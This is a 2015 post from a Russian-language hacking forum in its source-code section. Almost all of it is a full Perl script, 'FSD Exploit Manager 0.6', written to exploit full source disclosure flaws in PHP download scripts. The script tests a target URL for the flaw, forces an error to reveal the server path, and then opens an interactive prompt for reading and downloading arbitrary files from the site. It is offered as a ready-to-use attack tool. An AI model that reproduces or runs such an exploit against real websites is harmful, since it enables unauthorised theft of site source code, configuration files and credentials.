1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

[Perl] FSD Exploit Manager 0.6

Тема в разделе "Исходные коды", создана пользователем hisg, 6 июн 2015.

  1. TopicStarter Overlay
    hisg

    hisg

    Регистрация:
    6 июн 2015
    Сообщения:
    22
    Симпатии:
    1
    A simple Perl script to exploit the vulnerability Full Source Discloure just put the link of the page with the path vulnerable and can download files so easy with this script.

    A video with examples of use :


    Please login or register to view links
    Код:
    #!usr/bin/perl
    #FSD Exploit Manager 0.6
    #(C) Doddy Hackman 2014
    
    use Getopt::Long;
    use Color::Output;
    Color::Output::Init;
    use LWP::UserAgent;
    use URI::Split qw(uri_split);
    use File::Basename;
    use Cwd;
    
    my $nave = LWP::UserAgent->new();
    $nave->agent( $agents[ rand @agents ] );
    $nave->timeout(5);
    
    installer();
    
    GetOptions(
    "scan=s" => \$scan,
    "fpd" => \$fpd,
    "logs" => \$logs,
    "open" => \$open
    );
    
    head();
    
    if ($scan) {
    
    my $page = $scan;
    
    printear("\n[+] Scanning target : ");
    print $page. "\n\n";
    
    my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
    
    my $me = basename($path);
    
    $code1 = toma( $page . $me );
    if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
    printear_titulo("[+] Vulnerable\n");
    $code2 = toma( $page . "'" );
    if ( $code2 =~ /No such file or directory in <b>(.*)<\/b> on line/
    or $code2 =~
    /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ )
    {
    my $ruta = $1;
    my $cambiar = basename($ruta);
    $ruta =~ s/$cambiar//;
    
    my $prompt = "";
    
    if ($fpd) {
    printear("\n[+] Full Path Dislocure Detect : ");
    print $ruta. "\n";
    $prompt = "[" . $ruta . "] > ";
    }
    else {
    $prompt = "[prompt] > ";
    }
    
    unless ( -d $auth ) {
    mkdir( $auth, "0777" );
    chmod 0777, $auth;
    }
    chdir($auth);
    
    printear("\n[+] File Downloader : ");
    print "Ready\n";
    
    while (1) {
    $SIG{INT} = \&adios;
    printear_titulo( "\n" . $prompt );
    chomp( my $comando = <stdin> );
    if ( $comando =~ /!exit/ ) {
    adios();
    }
    elsif ( $comando =~ /!read_file (.*)/ ) {
    my $archivo = $1;
    my $code = "";
    my $code = toma( $page . $archivo );
    
    printear_logo(
    "\n----------------------------------------------------\n"
    );
    printear_titulo($code);
    printear_logo(
    "\n----------------------------------------------------\n"
    );
    
    }
    elsif ( $comando =~ /!download_file (.*)/ ) {
    my $archivo = $1;
    my $nombre = basename($archivo);
    printear_titulo("\n[+] Downloading file : ");
    print $nombre. "\n";
    if ( $nave->mirror( $page . $archivo, $nombre ) ) {
    printear("\n[+] File Downloaded\n");
    if ($open) {
    my $abrir = getcwd() . "/" . $nombre;
    if ( -f $abrir ) {
    abrir_archivo($abrir);
    }
    if ( !defined($logs) ) {
    if ( -f $abrir ) {
    unlink($abrir);
    }
    }
    }
    
    }
    else {
    printear("\n[-] File not downloaded\n");
    }
    }
    elsif ( $comando =~ /!help/ ) {
    printear( "\n[+] Commands : " . "\n\n" );
    printear("!download_file <file> : Download file\n");
    printear("!read_file <file> : Read File\n");
    printear("!help : Show commands\n");
    printear("!exit : To exit the program\n");
    }
    else {
    printear("\n[-] Command not found , try using !help\n");
    }
    
    }
    
    }
    }
    else {
    printear_titulo("[-] Not vulnerable\n");
    }
    }
    else {
    sintax();
    }
    
    copyright();
    
    sub abrir_archivo {
    my $os = $^O;
    if ( $os =~ /Win32/ig ) {
    system(qq(notepad.exe "$_[0]"));
    }
    else {
    system(qq(gedit '$_[0]'));
    }
    }
    
    sub printear {
    cprint( "\x036" . $_[0] . "\x030" );
    }
    
    sub printear_logo {
    cprint( "\x037" . $_[0] . "\x030" );
    }
    
    sub printear_titulo {
    cprint( "\x0310" . $_[0] . "\x030" );
    }
    
    sub sintax {
    printear("\n[+] Sintax : ");
    print "perl $0 <option> <value>\n";
    printear("\n[+] Options : \n\n");
    print "-scan <page> : FSD Exploit Scanner\n";
    print "-fpd : Check Full Path Discloure\n";
    print "-logs : Enable logs to save files downloaded\n";
    print "-open : Enable open files downloaded\n";
    printear("\n[+] Example : ");
    print "perl fsd.pl -scan http://localhost/download.php?down= -fpd -logs\n";
    copyright();
    }
    
    sub installer {
    unless ( -d "fsdlogs/" ) {
    mkdir( "fsdlogs/", "777" );
    chmod 0777, "fsdlogs/";
    }
    chdir("fsdlogs");
    }
    
    sub adios {
    printear_titulo("\n\n[+] Good Bye\n");
    copyright();
    }
    
    sub head {
    printear_logo("\n-- == FSD Exploit Manager 0.6 == --\n\n");
    }
    
    sub copyright {
    printear_logo("\n\n-- == (C) Doddy Hackman 2014 == --\n");
    exit(1);
    }
    
    sub toma {
    return $nave->get( $_[0] )->content;
    }
    
    #The End ?
    
     
    Метки:

Поделиться этой страницей

Загрузка...